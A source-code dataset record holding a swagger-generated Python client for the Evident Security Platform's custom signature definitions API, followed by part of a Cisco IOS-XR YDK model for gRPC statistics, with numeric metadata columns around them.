| 0
| 0.098039
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7ae04e396ac0721a2918a1ccabb6907959fac91f
| 37,404
|
py
|
Python
|
esp_sdk/apis/custom_signature_definitions_api.py
|
zimmermanc/esp-sdk-python
|
cdef13c0dc6c3996b6c444160c71b2f1e3910c97
|
[
"MIT"
] | 6
|
2017-06-05T20:37:19.000Z
|
2019-04-10T08:43:59.000Z
|
esp_sdk/apis/custom_signature_definitions_api.py
|
zimmermanc/esp-sdk-python
|
cdef13c0dc6c3996b6c444160c71b2f1e3910c97
|
[
"MIT"
] | 18
|
2016-06-22T16:14:33.000Z
|
2018-10-29T21:53:15.000Z
|
esp_sdk/apis/custom_signature_definitions_api.py
|
zimmermanc/esp-sdk-python
|
cdef13c0dc6c3996b6c444160c71b2f1e3910c97
|
[
"MIT"
] | 18
|
2016-07-27T19:20:01.000Z
|
2020-11-17T02:09:58.000Z
|
# coding: utf-8
"""
ESP Documentation
The Evident Security Platform API (version 2.0) is designed to allow users granular control over their Amazon Web Service security experience by allowing them to review alerts, monitor signatures, and create custom signatures.
OpenAPI spec version: v2_sdk
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class CustomSignatureDefinitionsApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def activate(self, custom_signature_definition_id, **kwargs):
"""
Activate a Custom Signature Definition
A successful call to this API marks the definition for activation. The definition will go into the 'validating' state and will be tested before activating. The definition must have a status of editable to be activated.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.activate(custom_signature_definition_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int custom_signature_definition_id: ID of Custom Signature Definition (required)
:param str include: Related objects that can be included in the response: custom_signature, results See Including Objects for more information.
:return: CustomSignatureDefinition
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.activate_with_http_info(custom_signature_definition_id, **kwargs)
else:
(data) = self.activate_with_http_info(custom_signature_definition_id, **kwargs)
return data
def activate_with_http_info(self, custom_signature_definition_id, **kwargs):
"""
Activate a Custom Signature Definition
A successful call to this API marks the definition for activation. The definition will go into the 'validating' state and will be tested before activating. The definition must have a status of editable to be activated.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.activate_with_http_info(custom_signature_definition_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int custom_signature_definition_id: ID of Custom Signature Definition (required)
:param str include: Related objects that can be included in the response: custom_signature, results See Including Objects for more information.
:return: CustomSignatureDefinition
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['custom_signature_definition_id', 'include']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method activate" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'custom_signature_definition_id' is set
if ('custom_signature_definition_id' not in params) or (params['custom_signature_definition_id'] is None):
raise ValueError("Missing the required parameter `custom_signature_definition_id` when calling `activate`")
collection_formats = {}
resource_path = '/api/v2/custom_signature_definitions/{custom_signature_definition_id}/activate.json_api'.replace('{format}', 'json_api')
path_params = {}
if 'custom_signature_definition_id' in params:
path_params['custom_signature_definition_id'] = params['custom_signature_definition_id']
query_params = {}
if 'include' in params:
query_params['include'] = params['include']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.api+json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/vnd.api+json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CustomSignatureDefinition',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def archive(self, custom_signature_definition_id, **kwargs):
"""
Archive a Custom Signature Definition
A successful call to this API archives and returns a specific custom signature definition identified by the id parameter. The definition must have a status of active to be archived.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.archive(custom_signature_definition_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int custom_signature_definition_id: ID of Custom Signature Definition (required)
:param str include: Related objects that can be included in the response: custom_signature, results See Including Objects for more information.
:return: CustomSignatureDefinition
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.archive_with_http_info(custom_signature_definition_id, **kwargs)
else:
(data) = self.archive_with_http_info(custom_signature_definition_id, **kwargs)
return data
def archive_with_http_info(self, custom_signature_definition_id, **kwargs):
"""
Archive a Custom Signature Definition
A successful call to this API archives and returns a specific custom signature definition identified by the id parameter. The definition must have a status of active to be archived.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.archive_with_http_info(custom_signature_definition_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int custom_signature_definition_id: ID of Custom Signature Definition (required)
:param str include: Related objects that can be included in the response: custom_signature, results See Including Objects for more information.
:return: CustomSignatureDefinition
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['custom_signature_definition_id', 'include']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method archive" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'custom_signature_definition_id' is set
if ('custom_signature_definition_id' not in params) or (params['custom_signature_definition_id'] is None):
raise ValueError("Missing the required parameter `custom_signature_definition_id` when calling `archive`")
collection_formats = {}
resource_path = '/api/v2/custom_signature_definitions/{custom_signature_definition_id}/archive.json_api'.replace('{format}', 'json_api')
path_params = {}
if 'custom_signature_definition_id' in params:
path_params['custom_signature_definition_id'] = params['custom_signature_definition_id']
query_params = {}
if 'include' in params:
query_params['include'] = params['include']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.api+json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/vnd.api+json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CustomSignatureDefinition',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create(self, custom_signature_id, **kwargs):
"""
Create a(n) Custom Signature Definition
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create(custom_signature_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int custom_signature_id: ID of the custom signature this definition belongs to (required)
:param str include: Related objects that can be included in the response: custom_signature, results See Including Objects for more information.
:return: CustomSignatureDefinition
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.create_with_http_info(custom_signature_id, **kwargs)
else:
(data) = self.create_with_http_info(custom_signature_id, **kwargs)
return data
def create_with_http_info(self, custom_signature_id, **kwargs):
"""
Create a(n) Custom Signature Definition
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_with_http_info(custom_signature_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int custom_signature_id: ID of the custom signature this definition belongs to (required)
:param str include: Related objects that can be included in the response: custom_signature, results See Including Objects for more information.
:return: CustomSignatureDefinition
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['custom_signature_id', 'include']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'custom_signature_id' is set
if ('custom_signature_id' not in params) or (params['custom_signature_id'] is None):
raise ValueError("Missing the required parameter `custom_signature_id` when calling `create`")
collection_formats = {}
resource_path = '/api/v2/custom_signature_definitions.json_api'.replace('{format}', 'json_api')
path_params = {}
query_params = {}
if 'include' in params:
query_params['include'] = params['include']
header_params = {}
form_params = []
local_var_files = {}
if 'custom_signature_id' in params:
form_params.append(('custom_signature_id', params['custom_signature_id']))
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.api+json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/vnd.api+json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CustomSignatureDefinition',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete(self, id, **kwargs):
"""
Delete a(n) Custom Signature Definition
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int id: Custom Signature Definition ID (required)
:return: Meta
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.delete_with_http_info(id, **kwargs)
else:
(data) = self.delete_with_http_info(id, **kwargs)
return data
def delete_with_http_info(self, id, **kwargs):
"""
Delete a(n) Custom Signature Definition
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int id: Custom Signature Definition ID (required)
:return: Meta
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `delete`")
collection_formats = {}
resource_path = '/api/v2/custom_signature_definitions/{id}.json_api'.replace('{format}', 'json_api')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.api+json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/vnd.api+json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Meta',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list(self, **kwargs):
"""
Get a list of Custom Signature Definitions
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str include: Related objects that can be included in the response: custom_signature, results See Including Objects for more information.
:param dict(str, str) filter: Filter Params for Searching. Equality Searchable Attributes: [id, language, status, version_number] Searchable Association: [custom_signature] See Searching Lists for more information. See the filter parameter of the association's list action to see what attributes are searchable on each association. See Conditions on Relationships in Searching Lists for more information.
:param str page: Page Number and Page Size. Number is the page number of the collection to return, size is the number of items to return per page.
:return: PaginatedCollection
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.list_with_http_info(**kwargs)
else:
(data) = self.list_with_http_info(**kwargs)
return data
def list_with_http_info(self, **kwargs):
"""
Get a list of Custom Signature Definitions
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str include: Related objects that can be included in the response: custom_signature, results See Including Objects for more information.
:param dict(str, str) filter: Filter Params for Searching. Equality Searchable Attributes: [id, language, status, version_number] Searchable Association: [custom_signature] See Searching Lists for more information. See the filter parameter of the association's list action to see what attributes are searchable on each association. See Conditions on Relationships in Searching Lists for more information.
:param str page: Page Number and Page Size. Number is the page number of the collection to return, size is the number of items to return per page.
:return: PaginatedCollection
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['include', 'filter', 'page']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
resource_path = '/api/v2/custom_signature_definitions.json_api'.replace('{format}', 'json_api')
path_params = {}
query_params = {}
if 'include' in params:
query_params['include'] = params['include']
header_params = {}
form_params = []
local_var_files = {}
if 'filter' in params:
form_params.append(('filter', params['filter']))
if 'page' in params:
form_params.append(('page', params['page']))
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.api+json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/vnd.api+json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PaginatedCollection',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def show(self, id, **kwargs):
"""
Show a single Custom Signature Definition
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.show(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int id: Custom Signature Definition ID (required)
:param str include: Related objects that can be included in the response: custom_signature, results See Including Objects for more information.
:return: CustomSignatureDefinition
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.show_with_http_info(id, **kwargs)
else:
(data) = self.show_with_http_info(id, **kwargs)
return data
def show_with_http_info(self, id, **kwargs):
"""
Show a single Custom Signature Definition
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.show_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int id: Custom Signature Definition ID (required)
:param str include: Related objects that can be included in the response: custom_signature, results See Including Objects for more information.
:return: CustomSignatureDefinition
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'include']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method show" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `show`")
collection_formats = {}
resource_path = '/api/v2/custom_signature_definitions/{id}.json_api'.replace('{format}', 'json_api')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
if 'include' in params:
query_params['include'] = params['include']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.api+json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/vnd.api+json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CustomSignatureDefinition',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update(self, id, **kwargs):
"""
Update a(n) Custom Signature Definition
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.update(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int id: Custom Signature Definition ID (required)
:param str include: Related objects that can be included in the response: custom_signature, results See Including Objects for more information.
:param str code: The code for this definition
:param str language: The language of the definition. Valid values are ruby, javascript
:return: CustomSignatureDefinition
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.update_with_http_info(id, **kwargs)
else:
(data) = self.update_with_http_info(id, **kwargs)
return data
def update_with_http_info(self, id, **kwargs):
"""
Update a(n) Custom Signature Definition
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.update_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int id: Custom Signature Definition ID (required)
:param str include: Related objects that can be included in the response: custom_signature, results See Including Objects for more information.
:param str code: The code for this definition
:param str language: The language of the definition. Valid values are ruby, javascript
:return: CustomSignatureDefinition
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'include', 'code', 'language']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `update`")
collection_formats = {}
resource_path = '/api/v2/custom_signature_definitions/{id}.json_api'.replace('{format}', 'json_api')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
if 'include' in params:
query_params['include'] = params['include']
header_params = {}
form_params = []
local_var_files = {}
if 'code' in params:
form_params.append(('code', params['code']))
if 'language' in params:
form_params.append(('language', params['language']))
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.api+json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/vnd.api+json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CustomSignatureDefinition',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 45.393204
| 416
| 0.594081
| 3,893
| 37,404
| 5.500385
| 0.063704
| 0.06935
| 0.067716
| 0.050437
| 0.947976
| 0.939149
| 0.933452
| 0.926447
| 0.915659
| 0.910522
| 0
| 0.000518
| 0.329564
| 37,404
| 823
| 417
| 45.44836
| 0.853372
| 0.375655
| 0
| 0.784119
| 0
| 0
| 0.183663
| 0.083851
| 0
| 0
| 0
| 0
| 0
| 1
| 0.037221
| false
| 0
| 0.01737
| 0
| 0.109181
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bb0b003d09dc863a8654eca0607ec912876d6392
| 17,284
|
py
|
Python
|
cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_man_ems_oper.py
|
tkamata-test/ydk-py
|
b637e7853a8edbbd31fbc05afa3aa4110b31c5f9
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_man_ems_oper.py
|
tkamata-test/ydk-py
|
b637e7853a8edbbd31fbc05afa3aa4110b31c5f9
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_man_ems_oper.py
|
tkamata-test/ydk-py
|
b637e7853a8edbbd31fbc05afa3aa4110b31c5f9
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
""" Cisco_IOS_XR_man_ems_oper
This module contains a collection of YANG definitions
for Cisco IOS\-XR man\-ems package operational data.
This module contains definitions
for the following management objects\:
grpc\: grpc commands
Copyright (c) 2013\-2016 by Cisco Systems, Inc.
All rights reserved.
"""
import re
import collections
from enum import Enum
from ydk.types import Empty, YList, YLeafList, DELETE, Decimal64, FixedBitsDict
from ydk.errors import YPYError, YPYModelError
class Grpc(object):
"""
grpc commands
.. attribute:: statistics
Grpc Statistics
**type**\: :py:class:`Statistics <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ems_oper.Grpc.Statistics>`
.. attribute:: status
Grpc Status
**type**\: :py:class:`Status <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ems_oper.Grpc.Status>`
"""
_prefix = 'man-ems-oper'
_revision = '2015-11-09'
def __init__(self):
self.statistics = Grpc.Statistics()
self.statistics.parent = self
self.status = Grpc.Status()
self.status.parent = self
class Statistics(object):
"""
Grpc Statistics
.. attribute:: address_family
AddressFamily
**type**\: str
.. attribute:: ct_cli_config_req_recv
CounterCliConfigReqRecv
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: ct_cli_config_res_sent
CounterCliConfigResSent
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: ct_commit_replace_req_recv
CounterCommitReplaceReq
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: ct_commit_replace_res_sent
CounterCommitReplaceRes
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: ct_delete_config_req_recv
CounterDeleteConfigReq
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: ct_delete_config_res_sent
CounterDeleteConfigRes
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: ct_get_config_req_recv
CounterGetConfigReqRecv
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: ct_get_config_res_sent
CounterGetConfigResSent
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: ct_get_current_session
CounterGetCurrentSession
**type**\: int
**range:** 0..4294967295
.. attribute:: ct_get_oper_req_recv
CounterGetOperReqRecv
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: ct_get_oper_res_sent
CounterGetOperResSent
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: ct_merge_config_req_recv
CounterMergeConfigReq
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: ct_merge_config_res_sent
CounterMergeConfigRes
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: ct_replace_config_req_recv
CounterReplaceConfigReq
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: ct_replace_config_res_sent
CounterReplaceConfigSent
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: ct_show_cmd_txt_req_recv
CounterShowCmdTxtReqRecv
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: ct_show_cmd_txt_res_sent
CounterShowCmdTxtResSent
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: listening_port
ListeningPort
**type**\: int
**range:** \-2147483648..2147483647
.. attribute:: max_req_per_user
MaxReqPerUser
**type**\: int
**range:** 0..4294967295
.. attribute:: max_req_total
MaxReqTotal
**type**\: int
**range:** 0..4294967295
.. attribute:: tls
GRPCTLS
**type**\: str
.. attribute:: transport
GRPCTransport
**type**\: str
.. attribute:: trustpoint
GRPCTrustpoint
**type**\: str
"""
_prefix = 'man-ems-oper'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self.address_family = None
self.ct_cli_config_req_recv = None
self.ct_cli_config_res_sent = None
self.ct_commit_replace_req_recv = None
self.ct_commit_replace_res_sent = None
self.ct_delete_config_req_recv = None
self.ct_delete_config_res_sent = None
self.ct_get_config_req_recv = None
self.ct_get_config_res_sent = None
self.ct_get_current_session = None
self.ct_get_oper_req_recv = None
self.ct_get_oper_res_sent = None
self.ct_merge_config_req_recv = None
self.ct_merge_config_res_sent = None
self.ct_replace_config_req_recv = None
self.ct_replace_config_res_sent = None
self.ct_show_cmd_txt_req_recv = None
self.ct_show_cmd_txt_res_sent = None
self.listening_port = None
self.max_req_per_user = None
self.max_req_total = None
self.tls = None
self.transport = None
self.trustpoint = None
@property
def _common_path(self):
return '/Cisco-IOS-XR-man-ems-oper:grpc/Cisco-IOS-XR-man-ems-oper:statistics'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if not self.is_config():
return False
if self.address_family is not None:
return True
if self.ct_cli_config_req_recv is not None:
return True
if self.ct_cli_config_res_sent is not None:
return True
if self.ct_commit_replace_req_recv is not None:
return True
if self.ct_commit_replace_res_sent is not None:
return True
if self.ct_delete_config_req_recv is not None:
return True
if self.ct_delete_config_res_sent is not None:
return True
if self.ct_get_config_req_recv is not None:
return True
if self.ct_get_config_res_sent is not None:
return True
if self.ct_get_current_session is not None:
return True
if self.ct_get_oper_req_recv is not None:
return True
if self.ct_get_oper_res_sent is not None:
return True
if self.ct_merge_config_req_recv is not None:
return True
if self.ct_merge_config_res_sent is not None:
return True
if self.ct_replace_config_req_recv is not None:
return True
if self.ct_replace_config_res_sent is not None:
return True
if self.ct_show_cmd_txt_req_recv is not None:
return True
if self.ct_show_cmd_txt_res_sent is not None:
return True
if self.listening_port is not None:
return True
if self.max_req_per_user is not None:
return True
if self.max_req_total is not None:
return True
if self.tls is not None:
return True
if self.transport is not None:
return True
if self.trustpoint is not None:
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_ems_oper as meta
return meta._meta_table['Grpc.Statistics']['meta_info']
class Status(object):
"""
Grpc Status
.. attribute:: address_family
AddressFamily
**type**\: str
.. attribute:: ct_cli_config_req_recv
CounterCliConfigReqRecv
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: ct_cli_config_res_sent
CounterCliConfigResSent
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: ct_commit_replace_req_recv
CounterCommitReplaceReq
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: ct_commit_replace_res_sent
CounterCommitReplaceRes
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: ct_delete_config_req_recv
CounterDeleteConfigReq
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: ct_delete_config_res_sent
CounterDeleteConfigRes
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: ct_get_config_req_recv
CounterGetConfigReqRecv
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: ct_get_config_res_sent
CounterGetConfigResSent
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: ct_get_current_session
CounterGetCurrentSession
**type**\: int
**range:** 0..4294967295
.. attribute:: ct_get_oper_req_recv
CounterGetOperReqRecv
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: ct_get_oper_res_sent
CounterGetOperResSent
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: ct_merge_config_req_recv
CounterMergeConfigReq
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: ct_merge_config_res_sent
CounterMergeConfigRes
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: ct_replace_config_req_recv
CounterReplaceConfigReq
**type**\: int
